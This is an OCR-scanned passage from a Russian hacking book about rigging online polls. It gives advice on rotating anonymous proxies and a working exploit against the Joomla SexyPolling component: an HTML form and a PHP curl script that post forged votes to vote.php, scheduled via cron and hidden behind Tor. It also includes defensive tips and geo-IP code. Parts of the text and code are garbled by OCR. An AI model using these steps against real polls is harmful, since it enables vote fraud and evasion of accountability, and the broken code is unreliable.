книги хакеры / Хакинг на примерах

Рис. 1.4. Расширение FireXProxy для Firefox

Не забывай регулярно обновлять список прокси. «Обработал» первые две страницы списка - обновляй, появятся новые прокси, возможно, с лучшими

параметрами. Недостатки:

•Если кто-то такой же умный, как и ты, то нужно действовать быстро. Ско­ рее всего, списки прокси окажутся и у конкурентов и IР-адреса будут заняты.

•Недостаток расширений вроде FireX Proxy - ограниченный набор прокси. На сайтах, публикующих списки, выбор будет побогаче.

Помню, как-то «накручивал» голосовалку на сайте, где можно было голосо­ вать раз в 24 часа. Соответственно, сегодня я узурпировал какой-то IР-адрес, завтра - кто-то другой. Довольно неблагодарное занятие, узурпирующее много времени. Поскольку человек - создание ленивое и умное, то нужно

искать альтернативные решения.

Как защититься?

Дабы уравнять шанс, делимся с веб-мастерами, как защититься от .анони...­

•майзеров. Способ прост как мир. Некоторые голосовалки позволяют

. . . . - .. -- - - - - - - - - - - - - - - -- - - - - - - - - - - - - - - - - - - -- - - - -- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

решается голосовать с одного и того же IP через определенное время.

Значит так: устанавливаем, что можно голосовать только с России (ты же не думаешь, что за мисс первого курса твоего универа будут голосовать из Кении. Бангладеша и Зимбабве?) и только с одного IP. Конечно. в России тоже есть анонимные прокси, но их гораздо меньше, чем во всем мире. Да и возможность проголосовать с одного IP толь ю один раз, позволит зачислить небольшое количество голосов, которое никак не повлияет на результат.

Если беспокоишься и за это небольшое количество, тогда делаем так: l. Ограничиваешь возможность голосования только с России

2.Ищешь в Инете постоянно обновляющиеся списки прокси, выбираешь только российские адреса (как правило, указывается страна прокси) и

добавляешь их в .htaccess в конструкции denyfrom)

3.Повторяешь пункт 2 каждый день - вдруг появится новый адрес. Голо­ сование не длится вечно, как правило, есть опр деленные сроки голо­

сования. Рано или поздно у тебя соберется хороший список российских прокси. который будет нужно будет обновлять, скажем, раз в месяц.

Сложнее, если сценарий не поддерживает ограничение по стране. Тогда нужно реализовать такую проверку собственными силами. Организовать проверку страны, города, региона по IР-адресу можно с помощью всевоз­ можных сервисов.

Вот как можно получить город с помощью geoplugin.net:

function get_geo_city($ip) {

$ip_data = @json_decode (file_get_contents("http://www. geoplugin.net/json.gp?ip=".$ip));

if($ip_data && $ip_data->geoplugin city != null)

{

$result = $ip_data->geoplugin city; return $result;

if($ip_data && $ip_data->geoplugin_region != null)

{

$result = $ip_data->geoplugin regionName;

return $result;

SxGeo

//Подключаем SxGeo.php класс include(«SxGeo.php»);

//Создаем объект

$SxGeo = new SxGeo('SxGeoCity.dat');

$ip = $_SERVER['REMOTE_ADDR']; var_export($SxGeo->getCityFull($ip)); // Вся информация о

2.3.4. Ломаем rолосовалку

,Последний способ самый сложный и заключается он в выявлении всевоз....­

можных «дыр)) в системе голосования. Недостаток - голосовалка может не

_ - - - - - - - -- - - - - -- - -- - - - - - - - -- --- - - - - - - - - -- - - - - - --- - -- - - - - - - - - - - - - - -- - - - - - - - - - - - -

Рис. 2.6. Определяем сценарий zолосовалки

Рис. 2. 7. Параметры, передаваемые сценарию

Рис. 2.8. Вычисляем ID голосования

•. - - - - - - - - - - - - - - - - - - - - - --- - - - - --- - - - - - - - - - - - - --- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ...

Рис. 2.9. Вычисляем ID ответа

Самый простой способ передачи РОSТ-запроса (а судя по JavaScript-кoдy отправляется именно РОSТ-запрос) - обычная НТМL-форма. Подойдет вот такая формочка:

<form action=»http://caйт/components/com_sexypolling/vote. php» method=post>

<input type=text name="polling_id" value="1821"> <input type=text name="sexypolling_token" value="l"> <input type=text name="answer id[]" value="l256"> <input type=submit>

</form>

Передаются ID голосования, номер ответа и параметр sexypolling. Открываем НТМL-файл в браузере (желательно через Tor, чтобы не светить свой IP) и нажимаем кнопочку Submit. Далее смотрим на счетчик - о чудо - он увеличился! Да, если бы расширение бьшо бы написано правильно и перед увеличением счетчика проверяло бы IР-адрес, то ничего бы не вышло. А оно было организовано иначе - сначала JS проверяет IP и отображает кра­ сивый счетчик времени до следующей попытки, если человек уже голосовал с этого IP, или же ((Дергает»сценарий vote.php, который щ,осто увеличивает счетчик нужного кандидата. И ему все равно, сколько вы отправили запро­ сов - хоть 100, хоть 10000 с одного IP.

Нажимать кнопочкуэто тоже работа, поэтому можно автоматизировать сей процесс:

<?php

if( $curl = curl_init() ) {

curl setopt($curl, CURLOPT_URL, 'http: / /caйт/components/ com_sexypolling/vote.php');

curl_setopt($curl, CURLOPT_RETURNTRANSFER,true); curl_setopt($curl, CURLOPT_POST, true); curl_setopt($curl, CURLOPT_POSTFIELDS, "polling_

id=1821&sexypolling_token=l&answer_id[]=1256"); $out = curl_ exec($curl);

//echo $out; curl_close($curl);

?>

Это простейший РНР-сценарий, отправляющий РОSТ-запрос сценарию vote.php. Думаю, сценарий понятен без каких-либо комментариев. Если у тебя есть вопросы, обратись к документации по РНР.

Далее нужно обеспечить автоматический запуск этого сценарий. Если ты счастливый пользователь VDS от Xelent или же у тебя на домашнем ком­ пе установлена Linux, самым правильным способом будет добавить вызов РНР-сценария (у меня он называется test.php) в расписание cron:

crontab -е

В данном примере сценарий запускается каждые 5 минут. То есть каждые 5 минут твой кандидат получит голос. При желании можно запускать этот сценарий каждую минуту или вообще организовать цикл и добавить любое количество голосов сразу. Здесь уже как захочешь.

Если же у тебя есть обычный хостинг, можешь «залить)) РНР-сценарий на­ крутки на хостинг, установить в браузер расширение перезагрузки страницы (вроде Page Reload) и настроить его на перезагрузку страницы со сценарием каждые несколько минут. Для сокрытия своего IP можно использовать..Tor

•Browser.

. .............. ... .. . .. .. .. . .. .. . .. . . ...... .......... . .. ... .... ... ... ... ... ... ....

Рис. 2.11. Расписание cron

. 2.3.6. Как защититься от взлома?

Есть три рекомендации:

1.Установить самую последнюю версию голосовалки. Есть ш нсы, что все известные «дыры» уже залатаны.

2.Погуглить и попытаться найти информацию об уязвимости используемо­ го компонента. Попытаться исправить «дыры» самому или обратиться к спецам.

3.Конкретно в случае SexyPollingсменить на другой компонент. Если уж сильно хочется использовать именно его, добавь в код vote.php проверку региона/страны. В самой голосовалке есть возможность ограничения по

стране, но ограничение не проблема обойти, поскольку сам vote.php не осуществляет такую проверку. Выше было показано, как организовать